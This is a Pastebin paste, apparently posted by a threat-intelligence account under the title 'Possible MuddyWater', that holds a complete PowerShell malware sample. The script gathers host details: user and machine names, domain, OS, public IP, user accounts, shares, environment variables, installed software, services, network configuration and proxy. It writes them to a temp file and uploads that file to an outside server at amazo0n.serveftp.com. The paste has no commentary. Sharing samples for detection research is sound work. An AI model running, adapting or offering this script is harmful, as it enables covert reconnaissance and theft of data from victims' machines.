SHARE
TWEET

2019-01-16: Possible MuddyWater

vk_intel Jan 17th, 2019 627 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function im(){$d=$env:APPDATA+"\ID.dat";if(test-path $d){$d1=Get-Content $d |Where-Object { $_ -match "ID=";};$d2=$d1 -split "=";return $d2[1];}}
  2. function MyTime(){try{return Get-Date -Format g;}catch{return "Error Time";}}
  3. function GetMachineName(){try{return $env:COMPUTERNAME;}catch{return "Error ComputerName";}}
  4. function GetUserName(){try{return $env:USERNAME;}catch{return "Error Username";}}
  5. function GetDomainName(){try{return $env:USERDOMAIN;}catch {return "Error Domain name";}}
  6. function OSDetails(){try{$Name = Get-WmiObject -Class Win32_OperatingSystem;return $Name.caption;}catch {return "Error Os name";}}
  7. function GetMyIP(){try{$wc = New-Object System.Net.WebClient;$wc.proxy = [Net.WebRequest]::GetSystemWebProxy();
  8. $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials;$readIP = $wc.DownloadString("https://api.ipify.org/");return $readIP;}catch{return "Erro Ip";}}
  9. function g-user{return Get-WmiObject -Class Win32_UserAccount}
  10. function Get-Information() {[CmdletBinding()]Param ()
  11. function registry_values($regkey, $regvalue,$child){if ($child -eq "no"){$key = get-item $regkey;}
  12. else{$key = get-childitem $regkey}$key | ForEach-Object {$values = Get-ItemProperty $_.PSPath; ForEach ($value in $_.Property) { if ($regvalue -eq "all") {$values.$value}
  13. elseif ($regvalue -eq "allname"){$value} else {$values.$regvalue;break}}}}
  14. $output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no")  -join "`r`n");
  15. $output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no")  -join "`r`n");
  16. $output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname")  -join "`r`n") ;
  17. $output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no")  -join "`r`n") ;
  18. $output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n");$output;}
  19. function prx(){try{return ([System.Net.WebProxy]::GetDefaultProxy()).Address}catch{return "error in read proxy"}}
  20. function ufile($filename,$id,$tname){try{$url="http://amazo0n.serveftp.com/users.php?tname="+$tname+"&path=Data";$enc=[System.Text.Encoding]::UTF8;$wc = New-Object System.Net.WebClient;
  21. $wc.proxy = [Net.WebRequest]::GetSystemWebProxy();$wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials;$wc.Headers.Add("Content-Type", "binary/octet-stream");
  22. $str = $enc.GetString($wc.UploadFile($url,"POST",$filename));$str=$str.trim();return $str;}catch{return "false";}}
  23. function main(){$r=im;$f=$env:TEMP+"\"+$r+".txt";$det1=MyTime;$det2=GetMachineName;$det3=GetUserName;$det4=GetDomainName;$det5=OSDetails;$det6=GetMyIP;$det7=g-user|Out-String;$det8=Get-Information;
  24. $det9=ipconfig /all|Out-String;$det11=prx|Out-String;
  25. $det0="RunTime: "+$det1+"`nMachinName: "+$det2+"`nUserName: "+$det3+"`nDomainName: "+$det4+"`nOsName: "+$det5+"`nIP: "+$det6+"`nG-user: "+$det7+"`nG_INF: "+$det8+"`nIPCONFIG: "+$det9+"`nProxy: "+$det11;
  26. $det0 | out-file $f -Encoding default -Force;$tname="T_"+$r;$d=ufile $f $r $tname;}
  27. main
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top